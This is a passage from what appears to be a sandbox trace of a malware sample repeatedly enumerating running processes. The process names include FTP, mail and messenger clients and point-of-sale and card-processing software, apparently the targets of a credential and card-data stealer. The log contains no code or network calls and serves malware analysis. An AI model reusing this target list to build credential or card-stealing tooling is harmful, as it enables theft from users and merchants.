szExeFile="bag-begin-gas.exe")) returned 1 [0286.969] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0286.971] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0286.972] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0286.974] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0286.975] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0286.977] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0286.978] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0286.982] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0286.984] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0286.985] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0286.987] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0286.988] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0286.990] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0286.991] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0286.993] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0286.994] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0286.998] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0287.000] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0287.002] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0287.004] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0287.006] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0287.008] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0287.010] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0287.045] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0287.047] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0287.049] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0287.051] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0287.053] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0287.055] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0287.056] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0287.062] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0287.066] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0287.068] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0287.070] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0287.072] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0287.076] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0287.078] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0287.080] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0287.082] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0287.083] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0287.085] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0287.087] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0287.136] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0287.141] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0287.143] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0287.146] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0287.148] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0287.150] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0287.155] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0287.158] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0287.160] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0287.162] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0287.164] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0287.170] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0287.172] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0287.174] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0287.176] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0287.178] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0287.180] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0287.232] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0287.235] CloseHandle (hObject=0x224c) returned 1 [0287.235] Sleep (dwMilliseconds=0x64) [0287.372] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0287.383] Process32First (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.385] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0287.387] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0287.391] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0287.392] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0287.394] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0287.395] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0287.397] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0287.398] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0287.400] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.402] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.406] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0287.408] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.409] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.411] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.412] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.414] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.416] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.462] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.465] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0287.466] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0287.468] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0287.470] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.471] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, 